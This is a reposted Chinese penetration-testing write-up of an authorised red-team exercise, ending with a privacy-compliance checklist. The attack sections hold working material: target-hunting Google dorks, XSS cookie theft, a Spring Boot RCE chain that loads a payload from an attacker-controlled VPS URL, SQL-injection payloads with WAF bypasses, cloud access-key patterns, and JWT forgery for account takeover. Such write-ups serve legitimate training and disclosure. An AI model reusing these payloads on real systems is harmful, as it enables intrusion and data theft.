问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
【转载】某次内部行业渗透测试&攻防演练多个系统从资产打点到RCE漏洞
渗透测试
这次文章主要是开始给师傅们分享目标指定的资产如何进行信息收集以及收集到对应的资产,如何快速有效的进行一个打点操作,写的都是我自己的实战经验,欢迎师傅们来交流,有些地方写的不足,希望师傅们可以补充。
0x1 前言 ------ 首先声明下,本次文章分享是有渗透测试授权的,且下面的漏洞都已经被修复,文章相关图片都已经被打码了,不做任何未授权、有危害的渗透测试、漏洞挖掘、攻防行为。  周期时间是一个星期,总共提交的有效漏洞报告是18个,前几天是先进行内部的渗透测试操作,后面几天就是内部模拟攻防演练行动,最后一天就是内部钓鱼演练。 这次文章主要是开始给师傅们分享目标指定的资产如何进行信息收集以及收集到对应的资产,如何快速有效的进行一个打点操作,写的都是我自己的实战经验,欢迎师傅们来交流,有些地方写的不足,希望师傅们可以补充。 后面给师傅们分享的是几个案例,很多漏洞报告太明显了,就没有分享,拿几个典型的给师傅们分享即可,希望师傅们都有收获!  0x2 攻防演练的简介和注意事项 ---------------- ### 一、什么是攻防演练 攻防演练是一种模拟真实攻击和防御的活动,旨在评估和提高组织的安全防护能力。在攻防演练中,一个团队(红队)扮演攻击者的角色,试图发起各种攻击,而另一个团队(蓝队)则扮演防御者的角色,负责检测、阻止和应对攻击。 ### 二、攻防演练的步骤 - **规划和准备:** 确定演练的目标、范围和规则,制定攻击方案和防御策略,并准备相应的工具和环境。 - **攻击模拟:** 红队使用各种攻击技术和工具,模拟真实攻击,如网络渗透、社会工程、恶意软件传播等,以测试组织的安全防护措施和响应能力。 - **防御检测:** 蓝队负责监测和检测红队的攻击行为,使用安全监控工具和技术,如入侵检测系统(IDS)、入侵防御系统(IPS)、日志分析等,及时发现和报告攻击。 - **攻防对抗:** 红队和蓝队之间进行攻防对抗,红队试图绕过蓝队的防御措施,而蓝队则尽力阻止和应对攻击,修复漏洞,提高安全防护能力。 - **分析和总结:** 演练结束后,对攻击和防御过程进行分析和总结,评估组织的安全弱点和改进空间,制定相应的安全改进计划。 通过攻防演练,用户可以发现和修复安全漏洞,提高安全防护能力,增强对真实攻击的应对能力,同时也可以培养和训练安全团队的技能和经验。攻防演练是一种有效的安全评估和提升手段,有助于保护组织的信息资产和业务安全。 ### 三、攻防演练常见丢分项有哪些?得分项有哪些? #### **常见的丢分项** 1\. 漏洞未修复:如果目标系统存在已知漏洞,但未及时修复,红队可以利用这些漏洞进行攻击,导致丢分。 2\. 弱密码和默认凭证:如果目标系统使用弱密码或者默认凭证,红队可以轻易地获取系统访问权限,导致丢分。 3\. 安全配置不当:如果目标系统的安全配置不当,例如开放了不必要的服务或者权限设置不正确,红队可以利用这些漏洞进行攻击,导致丢分。 4\. 未发现攻击行为:如果蓝队未能及时发现红队的攻击行为,或者未能有效地监测和检测到攻击,导致丢分。 5\. 未能及时响应和阻止攻击:如果蓝队未能及时响应红队的攻击行为,未能采取有效的防御措施,导致攻击成功或者造成严重影响,会丢分。 #### **常见的得分项** 1\. 漏洞修复和安全补丁:如果目标系统及时修复了已知漏洞,并安装了最新的安全补丁,可以得分。 2\. 强密码和凭证管理:如果目标系统使用强密码,并且凭证管理得当,可以得分。 3\. 安全配置和权限控制:如果目标系统的安全配置正确,并且权限控制合理,可以得分。 4\. 发现和报告攻击行为:如果蓝队能够及时发现红队的攻击行为,并及时报告,可以得分。 5\. 有效的防御和响应措施:如果蓝队能够采取有效的防御措施,及时响应和阻止攻击,可以得分。 得分项和丢分项的具体评判标准可能因不同的攻防演练规则和目标而有所不同。  0x3 指定资产收集&打点思路 ------------------- ### 一、信息收集/资产收集 改站点的首页如下,是个公司官网,拿到这样域名,直接去信息收集一波  这里先推荐去使用爱企查和风鸟这两个公司资产收集的网站,其中爱企查很多功能是收费的,但是收集的资产多,风鸟是免费的,两个一起使用效果好点  凤鸟还可以搜索相关的APP资产  首先拿公司名称到ICP/IP地址/域名信息备案管理系统搜索备案号以及备案的域名网站以及小程序、app等  然后拿到备案号去使用搜索引擎搜索,再导出域名   建议使用类型无影的相关工具搜索引擎的功能,然后一起导出,这样就可以一次性使用多个搜索引擎,且快速导出域名资产  就可以导出相关的域名了,且收集的资产要全  最后面还可以使用ENscan这个工具去爬取网络上面的这个公司相关的资产信息,然后导出给我们  跑出来的相关资产数据,我们就可以进行整理,然后与上面收集到的站点域名,进行汇总  ### 二、子域名/IP网段收集 子域名我常用的就是灯塔ARL+oneforall+空间引擎三种方式一起收集,利用上面的方式收集主域名相关资产,放到灯塔ARL去跑  然后灯塔扫描完成,就可以使用自带的导出功能进行选择数据的导出即可  把上面保存的主域名,放到oneforall里面去跑,收集对应的子域名即可  再利用上面的空间引擎搜索到的子域名,然后用收集到的数据进行去重  IP网段的话,推荐把上面工具手法收集到的IP资产,放到无影工具上面去资产整理即可得到IP网段  比如举例下面这个IP段,就可以这样去使用FOFA搜索,找到更多的存活域名资产 ```php ip="69.197.157.0/24" && is_domain=true ip="69.197.157.1/20" ```  ### 三、资产打点 这里推荐使用无影的web指纹识别,这个功能可以把我们导入的域名、IP直接进行探活和指纹检测操作  这里打点很快的一个方式,就是使用灯塔扫描敏感文件泄露,这个师傅们可以先去网上搜索下修改配置文件,也就是修改里面的默认敏感文件,可以把自己收藏的大字典放上去,效果更好,可以扫描到一些敏感文件出来,具体师傅们可以参考这篇文章: [https://blog.csdn.net/mashiro\_hibiki/article/details/138245669](https://blog.csdn.net/mashiro_hibiki/article/details/138245669),具体就是修改/app/dicts/目录下的file\_top\_2000.txt文件即可,下面就是我的字典文件,对应的修改下灯塔ARL的配置文件即可  如果师傅们没有安装灯塔的话,推荐师傅们看下地图大师的B站课程,安装灯塔的操作很简单,然后再进行配置相关操作,也就是上面的CSDN的博客地址即可 ```php 【【地图大师src漏洞挖掘番外篇】ARL资产灯塔自救指南】 https://www.bilibili.com/video/BV14W421R77j/?share_source=copy_web&vd_source=268f8d699ac32cf11e9bdc248399c5bd ```  等灯塔ARL跑完,就可以在文件泄露模块去看了  其次还有就是我一般喜欢在打开无影探测完的资产后,要是这个域名访问报错,或者没什么信息,我会使用Google语法来访问,有时候可以找到该站点的存活站点,从而打该站点的资产 就比如你访问http://xxxxx.xxx.com这个站点,显示下面的界面报错,一般别人遇到就放弃了  我们可以使用Google浏览器用site:域名尝试,有时候可以找到对应站点的别的访问路径,就不会报错了   下面给师傅们分享我收藏的一些Google语法: ```php 注入漏洞: site:edu.cn inurl:id|aspx|jsp|php|asp 文件上传: site:edu.cn inurl:file|load|editor|Files 前台登录: site:edu.cn intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username site:edu.cn inurl:login|admin|manage|manager|admin_login|login_admin|system|boss|master 敏感信息搜索: site:edu.cn ( "默认密码" OR "学号" OR "工号") 后台接口和敏感信息探测: site:edu.cn (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php) 查找暴露的特殊文件: site:edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf 常见的敏感文件扩展: site:edu.cn ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess XSS 漏洞倾向参数: inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:edu.cn 重定向漏洞倾向参数: inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:edu.cn SQL 注入倾向参数: inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:edu.cn SSRF 漏洞倾向参数: inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:edu.cn 本地文件包含(LFI)倾向参数: inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:edu.cn 远程命令执行(RCE)倾向参数: inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:edu.cn 敏感参数: inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:edu.cn API 文档: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:edu.cn 代码泄露: site:pastebin.com edu.cn 云存储: site:s3.amazonaws.com edu.cn JFrog Artifactory: site:jfrog.io edu.cn Firebase: site:firebaseio.com edu.cn 文件上传端点: site:edu.cn "choose file" 漏洞赏金和漏洞披露程序: "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" site:*/security.txt "bounty" 暴露的 Apache 服务器状态: site:*/server-status apache WordPress: inurl:/wp-admin/admin-ajax.php ``` 还有就是遇到站点打不进去,可以了解下JS相关打法,针对于自动化JS渗透测试的操作,这里我推荐师傅们使用转子这款工具,我个人觉得很强,收集JS信息非常详细,而且会进行自动分类漏洞详情,缺点就是只能在windows版本上面运行,所以要是别的操作系统的师傅们可以使用虚拟机试试。 使用的话,直接执行exe文件即可,然后下面直接插入URL地址即可,我喜欢后面加一个—scan=3 ```php --cer : 过证书 / https://www.xxx.com--cer --time=x : 超时设置 / https://www.xxx.com--time=5 --url : 自定义URL拼接 / https://www.xxx.com--url --proxy=127.0.0.1:8080 : 过证书 / https://www.xxx.com--proxy=127.0.0.1:8080 --sleep=x : 请求的睡眠时间 / https://www.xxx.com--sleep=0.5 --scan=1-5 : 扫描深度(默认为1,最高为5) / https://www.xxx.com--scan=3 ```  输出的内容蛮多的,之前有个企业SRC泄露的AK/SK就是这个,直接云接管一百多个G的资产,且可以进行使用CF提权操作  后面就可以按照对应的URL泄露的JS文件去找泄露和未授权即可  0x4 从XSS客服弹窗获取cookie到RCE ------------------------ ### 一、未授权接管admin管理员权限 书接上回,开始的官网有个客服的聊天功能点,猜测存在XSS漏洞  直接去里面找客服聊天,然后进行输入下库存的XSS标签payload  发现可以成功弹窗,那么这里尝试下使用弹客服cookie的payload,看看能不能弹cookie进行未授权登陆客服管理员的账户  这里成功获取到了客服的cookie值,然后尝试登陆口替换cookie未授权登陆后台  现在我们替换网站的cookie,发现可以成功登陆进去   登陆进去后发现账户上admin的管理员账户  ### 二、后台SSRF漏洞 进入后台后,发现后台有个图标管理可以进行新增操作,然后我这里尝试了XSS不行,后面就尝试打一个SSRF漏洞 插入一个DNSlog的域名,来验证看看是不是存在SSRF漏洞  发现DNSlog有回显记录,说明这里存在SSRF漏洞  ### 三、后台RCE漏洞 峰回路转,在这个站点找到了一个后台登陆口,且账号密码是弱口令:admin:Admin123  然后来到后台,发现这个存在cmd传参,让人觉得这个存在一个cmd的命令执行漏洞  然后把cmd传参的内容进行base64解密,发现是一个文件,说明是利用cmd传参命令执行读取文件  我这里直接进行尝试读取/etc/passwd文件,base64编码再进行使用cmd传参  成功读取/etc/passwd文件  Linux操作系统,执行命令获取改系统的内核版本信息 ```php ../../../../../../../..//proc/version ```  0x5 SpringBoot 1.x版本RCE漏洞 ------------------------- 这个漏洞案例之前比较忙单独写了一个投稿给先知社区没有收(尴尬了),单独一个漏洞比较简单了,这个是这次遇到的一个RCE漏洞,目前已经被修复了,也是当时拿着poc去跑的,然后试出来了一个。这次拿本地靶场搭建一下给师傅们演示下,跟这篇文章一起写着给师傅们分享下,大佬勿喷! ### 一、本地环境搭建和启动 这里为了方便给师傅们演示SpringBoot 2.x版本RCE漏洞,本地搭建靶场环境,可以让师傅们看到代码中这个漏洞存在的问题,后面师傅们也是可以利用FOFA和鹰图进行资产测绘,也是可以找到对应的目标资产,要是运气好点也是可以找到RCE漏洞,后面给师傅们放搜索语法。 直接使用Java的开发平台IDEA来启动我们的springboot环境,首先我们先定位到这个目录文件下  然后重新加载下这个项目的maven,因为开始默认没有刷新加载我们需要的Maven项目,加载完后就可以利用环境中的项目了  这个配置文件就是本地启动的地址+端口,也是可以修改的,方便我们后续使用burpsuit渗透测试利用  **接下来直接运行这个Application文件,启动Spring服务**  **访问web服务:**[**http://127.0.0.1:9092/**](http://127.0.0.1:9092/),可以看到这个就是经典的springboot界面了  ### 二、漏洞利用 #### 1、spring漏洞版本验证 首先,我们漏洞利用之前,需要先判断这个的spring版本,有spring 1.x和spring 2.x的版本 一般直接访问: ```php /env有数据的,spring 1.x版本 /actuator/env有数据的 ,spring 2.x版本 ``` 像这个基本上就是spring 1.x,直接访问/env有数据的,界面如下:  #### 2、测试是否存在RCE漏洞 **1、 设置 spring.cloud.bootstrap.location 属性** 首先先使用bp抓包  修改成POST,修改`Content-Type`和`spring.cloud.bootstrap.location`参数 ```php POST /env HTTP/1.1 Host: 127.0.0.1:9092 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 56 spring.cloud.bootstrap.location=http://DNSlog域名 ``` spring 1.x ```php POST /env Content-Type: application/x-www-form-urlencoded spring.cloud.bootstrap.location=http://your-vps-ip/example.yml ``` spring 2.x ```php POST /actuator/env Content-Type: application/json {"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"} ``` **配置好以后,发送数据包**  成功在/env显示成功了,配置成功  #### **3、刷新配置,DNSlog回显** 访问/refresh接口,刷新配置,数据包如下: ```php POST /refresh HTTP/1.1 Host: 127.0.0.1:9092 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` spring 1.x ```php POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ```php POST /actuator/refresh Content-Type: application/json ``` DNSlog成功回显,说明存在RCE漏洞  #### **4、RCE漏洞利用** 1、payload下载:<https://github.com/artsploit/yaml-payload>  2、打包java成jar执行文件 打包java成jar执行文件之前,修改下src/artsploit/AwesomeScriptEngineFactory.java文件 ```php exec("open -a Calculator") //macOS弹计算机命令,windows使用calc命令 ```  把java文件反编译成class文件 ```php javac src/artsploit/AwesomeScriptEngineFactory.java ``` 打包jar文件成功 ```php jar -cvf yaml-payload.jar -C src/ . ``` 在yaml-payload.jar文件同目录下生成一个exp.yml文件: ```php !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1/yaml-payload.jar"] ]] ] ```  3、启动本地服务 在yaml-payload-master目录下,为了后面本地弹计算机的操作 ```php python -m http.server 80 Serving HTTP on :: port 80 (http://[::]:80/) ... ``` 4、重新返回bp数据包,修改POST参数 ```php spring.cloud.bootstrap.location=http://127.0.0.1/exp.yml ``` 去执行exp.yml文件  5、弹计算机 然后再访问/refresh,刷新并执行exp.yml文件,成功弹计算机  0x6 阿里云存储接管 ----------- 这个漏洞想着还是给师傅们分享下,也就是前面介绍资产收集的过程,后面使用转子工具跑JS接口文件中,可以跑出一些敏感接口,里面有一些敏感信息,比如AK/SK,sfz、xm、手机号以及一些接口漏洞  **常见云的ak/sk特征** 下面我给师傅们介绍下常见的几个厂商的 `Access Key` 内容特征,然后就能够根据不同厂商 Key 的不同特征,直接能判断出这是哪家厂商的 `Access Key` ,从而针对性进行渗透测试。其中我们云服务器常见的就是阿里云和腾讯云了,我主要给师傅们介绍下面两种Access Key的特点。 **阿里云** 阿里云 (Alibaba Cloud) 的 Access Key 开头标识一般是 "`LTAI`"。 ^LTAI\[A-Za-z0-9\]{12,20}$ - **Access Key ID**长度为16-24个字符,由大写字母和数字组成。 - **Access Key Secret**长度为30个字符,由大写字母、小写字母和数字组成。 **腾讯云** 腾讯云 (Tencent Cloud) 的 Access Key 开头标识一般是 "`AKID`"。 ```php ^AKID[A-Za-z0-9]{13,20}$ ``` - SecretId长度为17个字符,由字母和数字组成。 - SecretKey长度为40个字符,由字母和数字组成。 可以使用行云管家进行云服务器接管操作  使用云存储桶工具登陆,接管云资产  成功云接管该公司云资产几十个G的内部公司文件  然后使用CF进行云接管操作也是可以的,可以看到目前还是root权限,最高权限,至此该资产全部都拿下了  0x7 前台SQL注入漏洞 ------------- 一个前台管理系统,通过1/1和1/0进行判断存在SQL注入 然后构造payload如下: ```php /student_list.php?cid=2/if((length(11))>1,1,0) ``` - `length(11)`:计算 “11” 的长度(字符串 “11” 的长度为 2)。 - 条件 `(length(11))>1`:即 `2>1`,结果为 **真**。 - 因此整个表达式的计算结果为 `1`(满足条件时返回第一个值)。  ```php /student_list.php?cid=2/if((length(1))>1,1,0) ``` - `length(1)`:计算 “1” 的长度(字符串 “1” 的长度为 1)。 - 条件 `(length(1))>1`:即 1`>1`,结果为**假**。 - 因此整个表达式的计算结果为 0(不满足条件时返回第二个值)。  最后通过判断数据库长度是7 ```php /student_list.php?cid=2/if((length(schema()))>1,1,0) //正常页面 /student_list.php?cid=2/if((length(schema()))>8,1,0) //报错 ```  针对SQL注入中关键字绕过,下面是waf过滤,对应的常见关键字替换: ```php schema() //数据库 database() @@version //版本 version() current_user //用户名 system_user() session_user() ```  0x8 JWT可爆破/未验证签名导致越权 -------------------- 这里使用天眼查网站,去寻找相关企业资产的微信小程序、微信公众号  首先通过微信搜索小程序,找到对应目标资产中的小程序系统  然后还有就是需要师傅们关注下微信公众号,很多官方的公众号关注之后,下面都有对应的微信小程序功能,或者跳转到web界面到功能点  这里来到我们熟悉的微信小程序功能界面,这个时候我们需要一直打开我们的bp抓取小程序的数据包(这个是一个测试小程序的一个好习惯,因为有些接口,包括敏感信息泄露,看历史的数据包很关键),然后看看数据包有没有什么提示,因为这里我的bp安装了HAE,一般重点关注带颜色的数据包  这里我们可以看到bp的历史数据包,显示了多个JSON Web Token也就是大家常说的JWT值,像一般碰到这样的JWT值,我一般都会选择JWT爆破尝试haiy选择有无设置None加密,去进行做一个渗透测试  这里先直接复制到<https://jwt.io/> 去看看这个JWT里面的内容,然后去猜测这个paylod校验哪部分  下面我来给师傅们讲解下这个payload代表什么,一些新手师傅可能没有了解过,包括后面进行数据包替换,也是要修改其中的payload值 | | | | |---|---|---| | 字段名 | 值 | 说明 | | role | appUser | 用户角色,表明用户属于应用层普通用户(非管理员) | | exp | 1747377338 | 令牌过期时间(Unix 时间戳)。通过转换可得具体时间:2025-11-14 11:15:38 UTC | | userId | xxxxxxxxxxxxxxxxxx | 用于标识用户身份 | | user\\\_key | xxxxx-xxxx-xxxx-xxxx | 用户密钥或关联密钥(可能用于访问控制或加密)。 | | username | 1xxxxxxxxx79 | 手机号,一键微信登陆的 | 这里先使用自己修改的JWT脚本爆破工具,看看能不能爆破出密钥 爆破发现其密钥为123456  然后直接来到刚才JWT的网站,去利用该key构造JWT,可以直接进入后台,下面的勾需要勾上  因为这里我经过测试,这个网站的JWT是对user\_key进行校验,所以只要在规定时间内user\_key不过期,那么我们就可以拿另外一个手机号进行测试,替换bp抓取登陆口的数据包,然后放包就可以直接登陆别的账号 首先这里需要修改下时间戳,拿这个网站:<https://tool.lu/timestamp/> 一般都是改成第二天的时间,不可以早于测试时间  还有就是把username替换下,这里我做测试,替换我的卡二,也就是最后面说93的尾号,因为经过测试,普通用户的role 都是appuser,这里猜测管理员可能是admin  然后直接在小程序登陆口,使用bp抓包,然后劫持数据包,进行替换token值,因为这里经过测试是校验的JWT值 通过不断替换JWT值,然后不断测试放包,放包,最后面可以直接不需要使用账号密码,直接登陆改账号  0x9 隐私合规漏洞 ---------- ### 一、SRC的隐私合规介绍 写文章写到这里,突然翻到了之前的笔记,看了下隐私合规漏洞的内容,然后上网搜了下,相关资料比较少,这里就给师傅们拓展下隐私合规漏洞。 像很多小程序和APP应用,都有这个隐私合规的东西  隐私合规,就是国家出台的对互联网公司的一个法律规范,防止 app 没有做好对用户的隐私合规性做出的规定,如果发现有公司的 app 没有按照要去要做,就会对该公司进行处罚,因此很多 src 会收取隐私合规漏洞。 比如:对于是否收取隐私合规漏洞,需要看他们的公告,如果没有写,那就一般不收取,如果写了隐私合规方面,并且还有奖励标准,那就收取! 下面拿小米SRC的隐私合规的公告给师傅们分享下:<https://sec.xiaomi.com/#/notice/detail/221>   就比如说下面的这几个小截屏,是不是我们平常在APP和小程序非常常见的一些弹窗提示,但是有些APP和小程序不提示这样的授权权限,而是非授权读取手机敏感个人信息,那么就违反了隐私合规,可以进行相关平台提交安全漏洞。  ### 二、隐私合规漏洞汇总 1. 一个 app 用户登录需要两个条款,用户协议和隐私政策。 2. 用户对于自己信息的处理,包括查看 删除 注销 投诉等以及政策发布,失效,更新日期等。 3. 隐私政策的描述的情况需要符合 APP 实际情形,比如隐私政策中对于注销,投诉提供的操作方法,需要与 app 内实际操作路径相同。 4. 对于业务开展目标用户为 14 周岁以下的儿童,需要有专门的儿童个人信息保护规则。 5. 举例:不同意隐私政策直接退出 app 算违规 如果有提醒则不算默认勾选同意的正常 算违规隐私政策需要采用“告知-同意”的方式,以明显的方式提醒用户阅读并主动同意隐私 政策。 6. 比如 APP 首次运行时,主动弹框提醒用户查看,用户点击同意后才能开始手机号个人信息和申请权限,弹窗要设置"同意"和"不同意"两个选项。 7. 在注册登录环节需要再次提醒用户查看,一般会采用勾选框等形式。也要确保用户进入APP 后能随时查看隐私政策,一般要求在四次(包含)以内点击就可以阅读到。所有地方的隐私政策内容需要保持一致。 8. 用户拒绝提供一些不必要的信息不可以直接退出 app(必须有二次提醒才可以退出) 9. 权限索取最小原则,寄快递的地方 app 需要你的定位,如果不仅仅要了你的定位则违规。 10. 拒绝定位不让用功能违规。 11. 有注册就要有注销的功能,没有就是违规。且注销的条件不能多余注册的条件。 12. 注销了 app 没有删除你的数据是不算的。 13. 注册的时候选择国家,台湾和中国是分开的。(不一定) 14. 在 app 使用中,用户拒绝了 app 权限授权,则 app 不能频繁申请权限。不频繁的申请评论应为超过 48 小时再次申请。 15. app 申请适用权限,不告知目的。算违规。 16. app 申请权限时,只有拒绝和始终同意,不算违规。 17. 实名认证也要告知-同意的原则 18. 推送功能是要求有关闭功能点的,没有就违规。 19. 开屏广告,不可诱导用户点击,比如欺骗按钮。 20. 用户投诉的渠道APP 内设置反馈表单,在线客服,智能客服等功能处理用户反馈。 21. 涉及人工处理的,承诺处理实现不超过 15 天。 22. 未成年类 23. 若是网络游戏服务,必须防沉迷,设置充值上限,未成年尽可周五,周六,周日和法定节假日每日 20-21 时向用户提供 1 小时服务。 24. 若是网络文学,网络动漫,网络直播,网络音频服务需要设置青少年模式,提供适合未成年用户浏览的内容。 25. 隐私政策涉及敏感信息的地方未加粗。 ### 三、隐私漏洞审核标准相关参考 - 《中华人民共和国个人信息保护法》 [http://www.cac.gov.cn/2021-08/20/c\_1631050028355286.htm](http://www.cac.gov.cn/2021-08/20/c_1631050028355286.htm) - 《App违法违规收集使用个人信息行为认定方法》 [http://www.cac.gov.cn/2019-12/27/c\_1578986455686625.htm?from=groupmessage&isappinstalled=0](http://www.cac.gov.cn/2019-12/27/c_1578986455686625.htm?from=groupmessage&isappinstalled=0) - 《工业和信息化部关于开展纵深推进APP侵害用户权益专项整治行动的通知》 [https://www.miit.gov.cn/jgsj/xgj/fwjd/art/2020/art\_0b18f16130584615a3c585b931092da6.html](https://www.miit.gov.cn/jgsj/xgj/fwjd/art/2020/art_0b18f16130584615a3c585b931092da6.html) - 《常见类型移动互联网应用程序必要个人信息范围规定》 [http://www.cac.gov.cn/2021-03/22/c\_1617990997054277.htm](http://www.cac.gov.cn/2021-03/22/c_1617990997054277.htm) - 《工业和信息化部关于进一步提升移动互联网应用服务能力的通知》 [https://www.miit.gov.cn/jgsj/xgj/gzdt/art/2023/art\_73991cdf4bb2407c822d475250cd21e7.html](https://www.miit.gov.cn/jgsj/xgj/gzdt/art/2023/art_73991cdf4bb2407c822d475250cd21e7.html)  0x10 总结 ------- 这篇文章开始给师傅们演示了下资产收集的过程,从对一个目标站点的信息收集再到对该资产站点的渗透测试,找边缘资产以及可以利用的功能点,从而再往下深入利用。 后面给师傅们分享了几个RCE漏洞的过程,还有之前一个前台SQL注入的案例,包括后面利用JS接口文档,找到对应的阿里云AK/SK泄露,从而云接管几十G的该公司云资产,再利用CF进行root权限接管,还有就是JWT爆破相关导致未授权的漏洞,最后面给师傅们分享下隐私合约的漏洞,我看这方面网上的介绍也是比较少的,所以拿出来给师傅们分享下了! 【转载】 原文作者:一个想当文人的黑客 首发平台:先知社区
发表于 2025-10-20 10:02:45
阅读 ( 503 )
分类:
渗透测试
3 推荐
收藏
0 条评论
请先
登录
后评论
routing
微信公众号:神农Sec,VX:routing_love
6 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!
